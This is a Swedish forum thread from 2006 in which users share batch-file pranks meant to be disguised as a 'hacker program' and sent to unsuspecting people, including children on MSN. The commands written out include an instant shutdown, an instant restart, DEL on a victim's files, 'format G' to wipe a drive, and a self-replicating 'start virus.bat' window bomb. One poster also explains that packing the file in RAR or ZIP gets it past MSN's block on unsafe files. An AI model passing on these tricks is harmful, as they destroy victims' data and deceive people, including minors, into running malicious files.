SwedenRockz Skrivet 22 Juni 2006 Rapport Dela Skrivet 22 Juni 2006 För alla er som vill kunna göra en .bat som stänger av datorn direkt: 1. Starta Anteckningar (Notepad) 2. Skriv Följande: Shutdown -s -t 01 3. Spara som: namn.bat *namn kan vara vadsomhelst men .bat måste finnas. Klart! Skicka den till någon dum unge och be han starta den, döp den till något "coolt" som SuPerR HaXxOr PrOgRam :D Citera Länk till kommentar Dela på andra sajter More sharing options...
Putside Skrivet 22 Juni 2006 Rapport Dela Skrivet 22 Juni 2006 Dum unge :D Citera Länk till kommentar Dela på andra sajter More sharing options...
Rallypack Skrivet 22 Juni 2006 Rapport Dela Skrivet 22 Juni 2006 Hehe ska testa. Citera Länk till kommentar Dela på andra sajter More sharing options...
LillBerra Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 Hahaha f*n va skönt, ska skicka den till alla 10 åringar som jag har på MSN fast jag inte vet hur dom fått min MSN :) Citera Länk till kommentar Dela på andra sajter More sharing options...
isMaNnen Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 tack.. vet precis vem jag ska skicka den till, muhahhaha. :P Citera Länk till kommentar Dela på andra sajter More sharing options...
ThePunisher Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 (redigerat) storebror - avstängd dator ^^ EDIT: går inte att skicka via msn <_< Redigerat 23 Juni 2006 av Boba-Fett Citera Länk till kommentar Dela på andra sajter More sharing options...
Putside Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 När man försöker skicka på MSN: "Filen som du försökte skicka bedömdes inte vara säker och skickades därför inte." Citera Länk till kommentar Dela på andra sajter More sharing options...
LillBerra Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 Packa in den i RAR fil, då fungerar det. (Eller ZIP) Citera Länk till kommentar Dela på andra sajter More sharing options...
ThePunisher Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 Packa in den i RAR fil, då fungerar det. (Eller ZIP) lol :lol: här ska du få en present, fint inpackad i rar ^^, Citera Länk till kommentar Dela på andra sajter More sharing options...
Gäst Janaz Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 programera i cmd e så jäkla kul finns även DEL "någon fil som din vän *ovän* gillar" det kommer ta bort fillen :P shutdown -r -t 01 | startar om datorn format G (kan bytas) (om din ovän har en extra hårdisk kommer filerna på den för svinna) Citera Länk till kommentar Dela på andra sajter More sharing options...
WASD Skrivet 23 Juni 2006 Rapport Dela Skrivet 23 Juni 2006 grymt! .bat filer är onda! prova denna skriv: "start virus.bat" & spara filen som virus.bat så öppnar den upp 200 fönster ps. skriv utan "" Citera Länk till kommentar Dela på andra sajter More sharing options...
Snake_16 Skrivet 24 Juni 2006 Rapport Dela Skrivet 24 Juni 2006 Grymt :evil: Citera Länk till kommentar Dela på andra sajter More sharing options...
Rekommendera inlägg
Gå med i konversationen
Du kan skriva nu och registrera dig senare. Om du har ett konto, logga in nu för att posta med ditt konto.